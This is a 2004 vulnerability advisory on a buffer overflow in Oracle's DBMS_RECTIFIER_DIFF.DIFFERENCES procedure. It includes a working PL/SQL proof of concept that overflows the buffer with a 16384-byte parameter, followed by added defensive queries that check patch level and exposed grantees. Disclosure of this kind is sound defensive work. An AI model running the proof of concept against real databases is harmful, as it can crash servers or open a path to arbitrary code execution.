#36 - Buffer overflow in procedure DIFFERENCES of DBMS_RECTIFIER_DIFF package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When the DIFFERENCES procedure is called with a long string in one of its parameters, a buffer overflow occurs. In the proof of concept below the overlong value (16384 bytes) is passed in MISSING_ROWS_ONAME1; the remaining parameters are placeholders.
To reproduce the overflow, execute the following PL/SQL block (for example in SQL*Plus, as a user who can execute the package):
DECLARE
  AAA VARCHAR2(32767);
BEGIN
  -- Build a 16384-byte string: one character doubled 14 times (2^14).
  AAA:='A';
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  -- All other arguments are harmless placeholders; the overlong value goes in MISSING_ROWS_ONAME1.
  SYS.DBMS_RECTIFIER_DIFF.DIFFERENCES (
    SNAME1              => 'Y',
    ONAME1              => 'Y',
    REFERENCE_SITE      => 'Y',
    SNAME2              => 'Y',
    ONAME2              => 'Y',
    COMPARISON_SITE     => 'Y',
    WHERE_CLAUSE        => 'Y',
    COLUMN_LIST         => 'Y',
    MISSING_ROWS_SNAME  => 'Y',
    MISSING_ROWS_ONAME1 => AAA,
    MISSING_ROWS_ONAME2 => 'Y',
    MISSING_ROWS_SITE   => 'Y',
    MAX_MISSING         => 1,
    COMMIT_ROWS         => 1);
END;
/
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE, by users connecting as SYSDBA, and by any user granted EXECUTE on the DBMS_RECTIFIER_DIFF package.
Successful exploitation allows an attacker to execute arbitrary code with the privileges of the Oracle server process. It can also be exploited to cause a denial of service (DoS) by crashing the Oracle server process handling the call.
Vendor Fix:
Fixed in Oracle9i Release 2 Patch Set 4 (9.2.0.5). Oracle 10g is not vulnerable.
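The following SQL is added here as a worked check and is not part of the original advisory. It is what a DBA or pentester would run after reading the Analysis and Vendor Fix sections: confirm the instance's version against the 9.2.0.5 fix level, then enumerate every principal that can reach the vulnerable procedure (direct EXECUTE grantees, holders of EXECUTE_CATALOG_ROLE including via nested roles, and password-file SYSDBA accounts). It assumes a DBA session with access to the standard data dictionary views named in it; the interim workaround at the end is a suggestion of mine, not something the advisory states.

```sql
-- Added check (not part of the original advisory). Run as a DBA.

-- 1. Fix level: the advisory's fix is 9.2.0.5 (Patch Set 4); 10g is not affected.
SELECT product, version
  FROM product_component_version
 WHERE product LIKE 'Oracle%';

-- 2. Principals with a direct EXECUTE grant on the vulnerable package.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_RECTIFIER_DIFF';

-- 3. Principals holding EXECUTE_CATALOG_ROLE directly or through nested roles.
--    The hierarchical query walks DBA_ROLE_PRIVS from the role up to its grantees;
--    the join to DBA_USERS tells users apart from intermediate roles.
SELECT DISTINCT rp.grantee,
       CASE WHEN u.username IS NOT NULL THEN 'USER' ELSE 'ROLE' END AS grantee_type
  FROM (SELECT grantee
          FROM dba_role_privs
         START WITH granted_role = 'EXECUTE_CATALOG_ROLE'
       CONNECT BY granted_role = PRIOR grantee) rp
  LEFT JOIN dba_users u ON u.username = rp.grantee
 ORDER BY grantee_type, rp.grantee;

-- 4. Accounts that can connect AS SYSDBA through the password file.
SELECT username, sysdba, sysoper
  FROM v$pwfile_users;

-- Interim workaround until the patch set is applied (my suggestion, not from the
-- advisory): revoke direct EXECUTE from accounts that do not administer
-- replication, which is what this package is used for, e.g.
--   REVOKE EXECUTE ON sys.dbms_rectifier_diff FROM some_user;
-- EXECUTE_CATALOG_ROLE is broad and widely granted, so treat the patch set as
-- the real fix rather than trying to strip the role.
```

The third query is the one that usually surprises people: a role granted to another role is enough to reach the package, so a flat look at DBA_ROLE_PRIVS for EXECUTE_CATALOG_ROLE undercounts the exposed population.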